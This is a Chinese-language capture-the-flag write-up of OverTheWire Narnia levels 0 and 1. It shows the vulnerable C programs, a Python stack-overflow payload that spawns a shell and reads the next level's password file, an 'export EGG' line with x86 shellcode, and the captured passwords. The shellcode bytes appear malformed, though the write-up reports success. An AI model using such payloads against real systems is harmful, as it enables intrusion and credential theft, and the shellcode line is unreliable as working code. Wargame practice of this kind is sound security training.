在线夺旗挑战站点

http://overthewire.org

Narnia设置

http://overthewire.org/wargames/narnia/

SSH登陆：narnia.labs.overthewire.org
端口：2226
账号：narnia0，narnia1，narnia2...以此类推
密码：narnia0，narnia1，narnia2...以此类推

阶段一：

命令：
  cd /narnia
查看c文件
  cat narnia0.c

image.png

/*
   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
   */
#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141; //41=A，42=B，最多可输入24字节
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

运行narnia0.c文件
命令
  ./narnia0
//最多输入24个字节，输入20个A，4个B后，val值变为B，说明此漏洞可利用

image.png

修改值为：0xdeadbeef!

命令：python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0

image.png

命令已成功写入，现在需要运行shell命令，如果匹配deadbeef，/bin/sh将被调用，
命令：
  (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0

image.png

成功获得密码 efeidiedae

阶段二

使用narnia1账号登陆系统
源代码

/*
   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
   */
#include <stdio.h>

int main(){
    int (*ret)();//指针，指向ret对应的数值

    if(getenv("EGG")==NULL){//引入一个环境变量EGG并将值存入变量ret中
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}

//如果将shellcode存储在环境变量EGG中，无论shellcode是什么内容，它都将被执行。直接将shellcode设置为/bin/sh，并将其赋值给EGG的环境变量

命令：
export EGG=`python -c 'print "\x31\xc0\x58\x2f\x62\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0"'`

密码:nairiepecu

未完待续！！！